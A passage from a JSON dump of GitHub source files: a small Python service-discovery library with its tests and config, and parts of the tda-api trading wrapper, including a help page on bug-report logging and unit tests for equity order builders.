None\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8253968358039856,
"avg_line_length": 62,
"blob_id": "0b8cf98036d66af14200341fc51674e0f0c8df5b",
"content_id": "ef33e481321a01bbd46105d7f0b5e6dc784d5a5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 1,
"path": "/service_discovery/__init__.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from .service_discovery import ServiceDiscovery # flake8: noqa\n"
},
{
"alpha_fraction": 0.6893890500068665,
"alphanum_fraction": 0.7028939127922058,
"avg_line_length": 33.55555725097656,
"blob_id": "e25bd66047e2b8024e10c8e3240c94fb93ca9467",
"content_id": "bf394fee2458e49da21b95a02f88007aa2bef383",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1555,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 45,
"path": "/tests/providers/env_service_provider_test.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from service_discovery.providers.env_provider import EnvServiceProvider\nfrom service_discovery.service_address import ServiceAddress\n\n\ndef test_injection_map():\n mock_environment = {\n 'SERVICE_INJECT_MAP':\n 'test_service?test_host:12%test_service2?localhost:1337'\n }\n\n env_services = EnvServiceProvider(env=mock_environment)\n\n for service in ['test_service', 'test_service2']:\n assert len(env_services.provide_all_service_addresses(service)) == 1\n\n test_service = env_services.provide_service_address('test_service')\n assert test_service == ServiceAddress('test_service', 'test_host', 12)\n\n\ndef test_service_override():\n mock_environment = {\n 'SERVICE_INJECT_MAP': 'test_service?test_host:17'\n }\n\n env_services = EnvServiceProvider(env=mock_environment)\n assert len(env_services.provide_all_service_addresses('no_service')) == 0\n\n new_mock_environment = {\n 'SERVICE_INJECT_MAP': 'test_service?test_host:17',\n 'SERVICE_NO_SERVICE': 'test_host:11'\n }\n env_services = EnvServiceProvider(env=new_mock_environment)\n no_service = env_services.provide_service_address('no_service')\n assert no_service == ServiceAddress('no_service', 'test_host', 11)\n\n\ndef test_no_env():\n mock_environment = {}\n\n env_services = EnvServiceProvider(env=mock_environment)\n\n test_service = env_services.provide_all_service_addresses('test_service')\n assert len(test_service) == 0\n test_service = env_services.provide_service_address('test_service')\n assert test_service is None\n"
},
{
"alpha_fraction": 0.5770833492279053,
"alphanum_fraction": 0.5822916626930237,
"avg_line_length": 29.967741012573242,
"blob_id": "0ccfe698bb80cda085d86a1ae5999f119c9ac23c",
"content_id": "110678ef4e194d9886b9a6d179e7752e3f850412",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/service_discovery/service_address.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\n\n\nclass ServiceAddress(object):\n\n @classmethod\n def from_host_port(cls, service_name, host_port, provenance='Unknown'):\n host, port = host_port.split(':')\n return cls(service_name, host, port, provenance)\n\n def __init__(self, service_name, host, port, provenance='Unknown'):\n self.service_name = service_name\n self.host = host\n self.port = int(port)\n self.provenance = provenance\n\n def get_host_port(self):\n return '{host}:{port}'.format(host=self.host, port=self.port)\n\n def __eq__(self, other):\n return (\n other.service_name == self.service_name and\n other.host == self.host and\n other.port == self.port\n )\n\n def __repr__(self):\n return '[{0}] @ {1}:{2} ({3})'.format(\n self.service_name, self.host, self.port, self.provenance\n )\n"
},
{
"alpha_fraction": 0.7948718070983887,
"alphanum_fraction": 0.8205128312110901,
"avg_line_length": 8.75,
"blob_id": "43e274d065a45316e9da903646e0259974a7d028",
"content_id": "871af0a8d7b51aa052df3b8ac1e7cb38d663a6b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 39,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 4,
"path": "/requirements-testing.txt",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "-r requirements.txt\npytest\nflake8\nmock\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 18,
"blob_id": "a3f8f7e2ede185165bcb2978f157d71167358cbe",
"content_id": "31f1e36afdd1f4cab88af6865e7efbb554dcf4e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 171,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/service_discovery/errors.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, absolute_import, division\n\n\nclass ServiceDiscoveryError(Exception):\n pass\n\n\nclass ServiceDiscoveryInitError(Exception):\n pass\n"
},
{
"alpha_fraction": 0.7340205907821655,
"alphanum_fraction": 0.7360824942588806,
"avg_line_length": 25.454545974731445,
"blob_id": "56a09ca6999ed767ba7ed6d20022c02014654ad7",
"content_id": "e0cecc7fafa553e3d6bcc1d31e2094b1d63ab79c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1455,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 55,
"path": "/README.md",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "Service Discovery\n=================\n\n*Please don't rely on this yet, this is a WIP code base.*\n\nThis library is intended to provide an abstraction on services running\nin a SOA. This is *not* a service discovery system, for that see \n[smartstack](http://nerds.airbnb.com/smartstack-service-discovery-cloud/),\n[consul](https://consul.io/),\n[curator](http://curator.apache.org/curator-x-discovery/index.html),\n[eureka](https://github.com/Netflix/eureka), or your other favorite discovery\nsystem.\n\nThe idea would be that no matter which service discovery system your org chooses\nto roll out you can use this service discovery interface to access them, and\nthen create provider plugins for your favorite discovery system.\n\nIt provides two main functions:\n\n1. A fixed interface for services to call as part of service discovery\n\n2. A plug and play provider system for providing #1\n\nInterface\n---------\nAt its core service discovery is about an interface:\n\nA few objects:\n\nServiceDiscovery\n----------------\n\n``init()``: Initialized the service discovery subsystem\n\n``inject_service(address)``:\n\n``get_service_address(service_name)``\n\n``get_all_service_addresses(service_name)``\n\nServiceAddress\n--------------\n``service_name``\n\n``host``\n\n``port``\n\n``get_host_port``\n\nServiceProvider\n---------------\nThese are the mechanisms by which we return addresses to the ServiceDiscovery\nclass, they implement a similar interface to ServiceDiscovery just without\ninjection.\n"
},
{
"alpha_fraction": 0.5559144020080566,
"alphanum_fraction": 0.5571255683898926,
"avg_line_length": 29.207317352294922,
"blob_id": "de4eeffaa5c26985efb01223825e710f5198bd18",
"content_id": "bfb0e632fe19b27fb6cf4008ca3203fea9031ec8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2477,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 82,
"path": "/service_discovery/service_discovery.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\nfrom service_discovery.providers.env_provider import EnvServiceProvider\nfrom service_discovery.errors import (\n ServiceDiscoveryInitError, ServiceDiscoveryError\n)\n\nimport threading\n\n\nclass ServiceDiscovery(object):\n PROVIDERS = [(EnvServiceProvider, ())]\n INJECTOR_PROVIDER_INDEX = 0\n\n __initialized = False\n __lock = threading.RLock()\n\n @classmethod\n def is_initialized(cls):\n return cls.__initialized\n\n @classmethod\n def init(cls):\n try:\n with cls.__lock:\n cls.providers = [\n provider(*args) for provider, args in cls.PROVIDERS\n ]\n cls.__initialized = True\n except Exception as exp:\n cls.__initialized = False\n raise ServiceDiscoveryInitError(exp)\n\n @classmethod\n def reset(cls):\n try:\n with cls.__lock:\n cls.__initialized = False\n except Exception as exp:\n cls.__initialized = False\n raise exp\n\n @classmethod\n def inject_service(cls, service_address):\n try:\n with cls.__lock:\n if not cls.__initialized:\n cls.init()\n cls.providers[cls.INJECTOR_PROVIDER_INDEX].inject(\n service_address\n )\n except Exception as exp:\n raise ServiceDiscoveryError(exp)\n\n @classmethod\n def _query_providers(cls, service_name, method_name):\n try:\n with cls.__lock:\n if not cls.__initialized:\n cls.init()\n for provider in cls.providers:\n provider_response = getattr(provider, method_name)(\n service_name\n )\n print(provider_response)\n if provider_response:\n return provider_response\n raise Exception('Could not find {0}'.format(service_name))\n except Exception as exp:\n raise ServiceDiscoveryError(exp)\n\n @classmethod\n def get_all_service_addresses(cls, service_name):\n return cls._query_providers(\n service_name, 'provide_all_service_addresses'\n )\n\n @classmethod\n def get_service_address(cls, service_name):\n return cls._query_providers(\n service_name, 'provide_service_address'\n )\n"
},
{
"alpha_fraction": 0.7044642567634583,
"alphanum_fraction": 0.7080357074737549,
"avg_line_length": 35.129032135009766,
"blob_id": "1bf45c6b2a632d65cbe5eca73b52e8eda98cd3e4",
"content_id": "2f096d3c5a45dd774c453b75d862299019d943e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1120,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 31,
"path": "/tests/test_service_discovery.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from service_discovery import ServiceDiscovery\nfrom service_discovery.service_address import ServiceAddress\nfrom service_discovery.errors import ServiceDiscoveryError\nimport pytest\n\n\nclass TestServiceDiscovery(object):\n def setup_method(self, method):\n ServiceDiscovery.reset()\n\n def test_init(self):\n assert not ServiceDiscovery.is_initialized()\n ServiceDiscovery.init()\n assert ServiceDiscovery.is_initialized()\n\n def test_injection(self):\n assert not ServiceDiscovery.is_initialized()\n mock_service = ServiceAddress(\n 'test_service', 'localhost', 1337, 'tests'\n )\n ServiceDiscovery.inject_service(mock_service)\n\n addresses = ServiceDiscovery.get_all_service_addresses('test_service')\n address = ServiceDiscovery.get_service_address('test_service')\n assert [mock_service] == addresses\n assert mock_service == address\n\n def test_errors(self):\n assert not ServiceDiscovery.is_initialized()\n with pytest.raises(ServiceDiscoveryError):\n ServiceDiscovery.get_service_address('nopenopenope')\n"
},
{
"alpha_fraction": 0.6822429895401001,
"alphanum_fraction": 0.6985981464385986,
"avg_line_length": 21.526315689086914,
"blob_id": "09a833cdf7e02e075ad71d9a54e4544e1eaa804e",
"content_id": "60e54b0797237c1d29e65af6397c1044a3e4048a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 19,
"path": "/tox.ini",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "[tox]\nenvlist = py26,py27,py34,coverage\n\n[testenv]\ndeps =\n -rrequirements-testing.txt\ncommands =\n py.test {posargs:tests}\n flake8 service_discovery tests\n\n[testenv:coverage]\ndeps =\n -rrequirements-testing.txt\n coverage\ncommands =\n coverage erase\n coverage run -m py.test {posargs:tests}\n coverage combine\n coverage report --omit=.tox/*,tests/*,packages/*,/usr/share/pyshared/*,/usr/lib/pymodules/* -m\n"
}
] | 14 |
woneata/oldatm
|
https://github.com/woneata/oldatm
|
4f99de45478bb6bb095090323c64ad1ab631aaf5
|
b7fc13bf7114d4b1c7df4a139f57ef7e07f6999a
|
a8fe204d8d582b5f14c5dd3b50b4b5a9b46b2677
|
refs/heads/main
| 2023-04-22T11:42:16.606868 | 2021-04-07T12:46:29 | 2021-04-07T12:46:29 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5333616733551025,
"alphanum_fraction": 0.5448364019393921,
"avg_line_length": 19.409090042114258,
"blob_id": "629b146f8dd10b5fed4a96c3878dc4b0f6df2504",
"content_id": "a8c80c332f076f59b956f8179c17cc7026d74b39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2353,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 110,
"path": "/auth.py",
"repo_name": "woneata/oldatm",
"src_encoding": "UTF-8",
"text": "#register\r\n#-first name, last name, password, email\r\n#-generate user id\r\n\r\n#login\r\n# - account number, email and password\r\n\r\n#bank operations\r\n\r\n#Initializing the system\r\n\r\nimport random\r\ndatabase ={} #dictionary\r\n\r\ndef init():\r\n \r\n print(\"Welcome to Bank PHP\")\r\n\r\n \r\n haveAccount = int(input(\"Do you have an account with us: 1 (yes) 2 (no)? \\n\"))\r\n\r\n if(haveAccount == 1):\r\n \r\n login()\r\n elif(haveAccount == 2):\r\n \r\n print(register())\r\n else: \r\n print(\"You have selected an invalid option\")\r\n init()\r\n\r\ndef login():\r\n print(\"******* Login *******\")\r\n\r\n accountNumberFromUser = int(input(\"What is your account number? \\n\"))\r\n password = input(\"What is your password? \\n\")\r\n\r\n for accountNumber, userDetails in database.items():\r\n if(userDetails[3] == password):\r\n operations(userDetails)\r\n print('Invalid account or password')\r\n login()\r\n\r\n \r\n\r\ndef register():\r\n print('****** Register ******')\r\n\r\n email = input(\"What is your email address? \\n\")\r\n first_name = input(\"What is your first name? \\n\")\r\n last_name = input (\"What is your last name? \\n\")\r\n password = input('Create a password? \\n')\r\n\r\n accountNumber = generateAccountNumber()\r\n\r\n database[accountNumber] = [ first_name, last_name, email, password ]\r\n\r\n print(\"Your account has been created\")\r\n print(\" == ==== ===== ===== ===\")\r\n print('Your account number is: %d' % accountNumber)\r\n print('Make sure you keep it safe')\r\n print(\" == ==== ===== ===== ===\")\r\n\r\n login()\r\n\r\n \r\n\r\ndef operations(user):\r\n print('Welcome %s %s' %( user[0], user[1] ) )\r\n \r\n selectedOption = int(input(\"What would you like to do? (1) deposit (2) deposit (3) Logout (4) Exit \\n\"))\r\n\r\n if(selectedOption == 1):\r\n \r\n deposit()\r\n elif(selectedOption == 2):\r\n \r\n withdrawal()\r\n elif(selectedOption == 3):\r\n logout()\r\n \r\n elif(selectedOption == 4):\r\n \r\n exit()\r\n else:\r\n print(\"Invalid option selected\")\r\n operations(user)\r\n\r\n\r\ndef withdrawal():\r\n print('Withdrawal')\r\n\r\ndef deposit():\r\n print('Deposit')\r\n\r\ndef generateAccountNumber():\r\n\r\n return random.randrange(111111,999999)\r\n\r\ndef logout():\r\n login()\r\n\r\n\r\n\r\n\r\n\r\n\r\n#### ACTUAL BANKING SYSTEM\r\n\r\ninit()"
}
] | 1 |
cRAN-cg/todoman
|
https://github.com/cRAN-cg/todoman
|
91aa25fcd32c42d2ff27cab432bee256d58eec7b
|
3238c73114a3718a302419a526442d56c3011252
|
c492888f24db5ee28f726a5e2434be3b5935264d
|
refs/heads/master
| 2021-01-22T22:28:15.113373 | 2017-05-29T21:03:22 | 2017-05-29T21:03:22 | 92,775,061 | 0 | 0 | null | 2017-05-29T21:00:10 | 2017-05-04T23:15:14 | 2017-05-27T20:36:40 | null |
[
{
"alpha_fraction": 0.7214533090591431,
"alphanum_fraction": 0.7491349577903748,
"avg_line_length": 16.515151977539062,
"blob_id": "17a487371ebf5503aafabec98e09b6eecc976693",
"content_id": "6e3d1a5d2f2846f87f65fdd66792b6504afda159",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 578,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 33,
"path": "/tox.ini",
"repo_name": "cRAN-cg/todoman",
"src_encoding": "UTF-8",
"text": "[tox]\nenvlist = py33, py34, py35, py36, flake8, docs\nskip_missing_interpreters = True\n\n[testenv]\ndeps =\n -rrequirements.txt\n -rrequirements-dev.txt\ncommands = py.test --cov todoman\nsetenv =\n PYTHONPATH = {toxinidir}\npassenv = CI\n\n[testenv:flake8]\nbasepython = python3\nskip_install = True\ndeps =\n flake8\n flake8-import-order\ncommands = flake8\n\n[testenv:docs]\nbasepython = python3\nwhitelist_externals =\n make\ncommands =\n pip install -rrequirements-docs.txt\n make -C docs html\n\n[flake8]\nexclude=.tox,build\napplication-import-names=todoman,tests\nimport-order-style=smarkets\n"
},
{
"alpha_fraction": 0.5660640001296997,
"alphanum_fraction": 0.5785813927650452,
"avg_line_length": 20.147058486938477,
"blob_id": "276a50297141f61c22848183c4957b6eab49639d",
"content_id": "0da42a6a87c6508d4853660eb6035d0a89c84caa",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 34,
"path": "/todoman/exceptions.py",
"repo_name": "cRAN-cg/todoman",
"src_encoding": "UTF-8",
"text": "class TodomanException(Exception):\n \"\"\"\n Base class for all our exceptions.\n\n Should not be raised directly.\n \"\"\"\n pass\n\n\nclass NoSuchTodo(TodomanException):\n EXIT_CODE = 20\n\n def __str__(self):\n return 'No todo with id {}.'.format(self.args[0])\n\n\nclass ReadOnlyTodo(TodomanException):\n EXIT_CODE = 21\n\n def __str__(self):\n return (\n 'Todo is in read-only mode because there are multiple todos in {}.'\n .format(self.args[0])\n )\n\n\nclass NoListsFound(TodomanException):\n EXIT_CODE = 22\n\n def __str__(self):\n return (\n 'No lists found matching {}, create a directory for a new list.'\n .format(self.args[0])\n )\n"
},
{
"alpha_fraction": 0.5909090638160706,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 21,
"blob_id": "1c4afb86627b86e911152d429e559e780f8b23ed",
"content_id": "48d172b17e944934508f613a21e397c4ecf584f0",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 22,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 1,
"path": "/requirements-docs.txt",
"repo_name": "cRAN-cg/todoman",
"src_encoding": "UTF-8",
"text": "sphinx_autorun>=1.0.0\n"
}
] | 3 |
berzoidberg/tda-api
|
https://github.com/berzoidberg/tda-api
|
94d4e87107abcbd1248a3b9cedd22697c716783b
|
02979f9d60c20af845592a074585c72d783e30be
|
de2dc6de53dc6c1b702d45be06753713d7193e3f
|
refs/heads/master
| 2022-12-10T12:07:41.577518 | 2020-09-13T04:24:29 | 2020-09-13T04:24:29 | 294,240,679 | 1 | 1 |
MIT
| 2020-09-09T22:10:20 | 2020-09-09T05:24:03 | 2020-09-06T01:38:02 | null |
[
{
"alpha_fraction": 0.7146946787834167,
"alphanum_fraction": 0.7153307795524597,
"avg_line_length": 35.13793182373047,
"blob_id": "92fba96e23337480264cec7c07414a95f35bb09b",
"content_id": "e97f4d033e63cdd7c49f108eaf6e52147df925f8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 3144,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 87,
"path": "/docs/help.rst",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": ".. highlight:: python\n.. py:module:: tda.debug\n\n.. _help:\n\n============\nGetting Help\n============\n\n``tda-api`` is not perfect. Features are missing, documentation may be out of \ndate, and it almost certainly contains bugs. If you think of a way in which\n``tda-api`` can be improved, we're more than happy to hear it. \n\nThis page outlines the process for getting help if you found a bug. If you need \ngeneral help using ``tda-api``, or just want to chat with other people \ninterested in developing trading strategies, you can \n`join our discord <https://discord.gg/M3vjtHj>`__.\n\nIf you still want to submit an issue, we ask that you follow a few guidelines to \nmake both our lives easier:\n\n\n--------------\nEnable Logging\n--------------\n\nBehind the scenes, ``tda-api`` performs diagnostic logging of its activity using \nPython's `logging <https://docs.python.org/3/library/logging.html>`__ module. \nYou can enable this debug information by telling the root logger to print these \nmessages:\n\n.. code-block:: python\n\n import logging\n logging.getLogger('').addHandler(logging.StreamHandler())\n\nSometimes, this additional logging is enough to help you debug. Before you ask \nfor help, carefully read through your logs to see if there's anything there that \nhelps you.\n\n\n-------------------------------\nGather Logs For Your Bug Report\n-------------------------------\n\nIf you still can't figure out what's going wrong, ``tda-api`` has special \nfunctionality for gathering and preparing logs for filing issues. It works by \ncapturing ``tda-api``'s logs, anonymizing them, and then dumping them to the \nconsole when the program exits. You can enable this by calling this method \n**before doing anything else in your application**:\n\n.. code-block:: python\n\n tda.debug.enable_bug_report_logging()\n\nThis method will redact the logs to scrub them of common secrets, like account \nIDs, tokens, access keys, etc. However, this redaction is not guaranteed to be \nperfect, and it is your responsibility to make sure they are clean before you \nask for help.\n\nWhen filing a issue, please upload the logs along with your description. **If\nyou do not include logs with your issue, your issue may be closed**. \n\nFor completeness, here is this method's documentation:\n\n.. automethod:: tda.debug.enable_bug_report_logging\n\n\n------------------\nSubmit Your Ticket\n------------------\n\nYou are now ready to write your bug. Before you do, be warned that your issue\nmay be be closed if:\n\n * It does not include code. The first thing we do when we receive your issue is \n we try to reproduce your failure. We can't do that if you don't show us your\n code.\n * It does not include logs. It's very difficult to debug problems without logs.\n * Logs are not adequately redacted. This is for your own protection.\n * Logs are copy-pasted into the issue message field. Please write them to a \n file and attach them to your issue.\n * You do not follow the issue template. We're not *super* strict about this \n one, but you should at least include all the information it asks for.\n\nYou can file an issue on our `GitHub page <https://github.com/alexgolec/tda-api/\nissues>`__.\n"
},
{
"alpha_fraction": 0.8717948794364929,
"alphanum_fraction": 0.8717948794364929,
"avg_line_length": 9.636363983154297,
"blob_id": "6da7ffe48ac52aeb45d9505b3f47155c21d10005",
"content_id": "acaaa7dfef02db9fda0ca4ce624af684b69a555a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 117,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 11,
"path": "/requirements.txt",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "asynctest\ncolorama\ncoverage\nrequests_oauthlib\npython-dateutil\npytest\npytz\nselenium\nsphinx_rtd_theme\ntwine\nwebsockets\n"
},
{
"alpha_fraction": 0.4878534972667694,
"alphanum_fraction": 0.500436007976532,
"avg_line_length": 33.01271057128906,
"blob_id": "7ea4fc2fc2e617547326afecbc3d48e110de1efd",
"content_id": "a506a21b9f94d766e7ebf45990b0cf711f2799bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8027,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 236,
"path": "/tests/test_orders.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom tda.orders.common import *\nfrom tda.orders.equities import *\nfrom .utils import has_diff, no_duplicates\nfrom . import test_utils\n\n\nclass EquityOrderBuilderTest(unittest.TestCase):\n\n def valid_order(self):\n 'Returns a valid MARKET order'\n return EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.MARKET) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL)\n\n @no_duplicates\n def test_successful_construction_market(self):\n order = EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.MARKET) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL) \\\n .build()\n\n self.assertTrue(('orderType', 'MARKET') in order.items())\n self.assertTrue(('session', 'NORMAL') in order.items())\n self.assertTrue(('duration', 'DAY') in order.items())\n self.assertTrue(\n ('instruction', 'BUY')\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('quantity', 10)\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('symbol', 'AAPL')\n in order['orderLegCollection'][0]['instrument'].items())\n\n @no_duplicates\n def test_successful_construction_limit(self):\n order = EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.LIMIT) \\\n .set_price(100.5) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL) \\\n .build()\n\n self.assertTrue(('orderType', 'LIMIT') in order.items())\n self.assertTrue(('session', 'NORMAL') in order.items())\n self.assertTrue(('duration', 'DAY') in order.items())\n self.assertTrue(('price', 100.5) in order.items())\n self.assertTrue(\n ('instruction', 'BUY')\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('quantity', 10)\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('symbol', 'AAPL')\n in order['orderLegCollection'][0]['instrument'].items())\n\n @no_duplicates\n def test_limit_requires_price(self):\n order = EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.LIMIT) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL)\n\n with self.assertRaises(\n InvalidOrderException, msg='price must be set'):\n order.build()\n\n order.set_price(100)\n order.build()\n\n def field_required(self, name):\n order = self.valid_order()\n setattr(order, name, None)\n with self.assertRaises(\n InvalidOrderException, msg='{} must be set'.format(name)):\n order.build()\n\n @no_duplicates\n def test_order_type_required(self):\n self.field_required('order_type')\n\n @no_duplicates\n def test_session_required(self):\n self.field_required('session')\n\n @no_duplicates\n def test_duration_required(self):\n self.field_required('duration')\n\n @no_duplicates\n def test_instruction_required(self):\n self.field_required('instruction')\n\n\nclass BuilderTemplates(unittest.TestCase):\n\n def test_equity_buy_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_market('GOOG', 10).build()))\n\n def test_equity_buy_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 
'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_limit('GOOG', 10, 199.99).build()))\n\n def test_equity_sell_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_market('GOOG', 10).build()))\n\n def test_equity_sell_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_limit('GOOG', 10, 199.99).build()))\n\n def test_equity_sell_short_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL_SHORT',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_short_market('GOOG', 10).build()))\n\n def test_equity_sell_short_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL_SHORT',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_short_limit('GOOG', 10, 199.99).build()))\n\n def test_equity_buy_to_cover_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY_TO_COVER',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_to_cover_market('GOOG', 10).build()))\n\n def test_equity_buy_to_cover_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY_TO_COVER',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_to_cover_limit('GOOG', 10, 199.99).build()))\n"
},
{
"alpha_fraction": 0.6559766530990601,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 15.333333015441895,
"blob_id": "621b2711dce0cd9e1f2d6db667d7f4c3870344d9",
"content_id": "4d86dfb0fde85f9a8eb9e79f4e8385a5fbd1bd87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 343,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 21,
"path": "/tox.ini",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
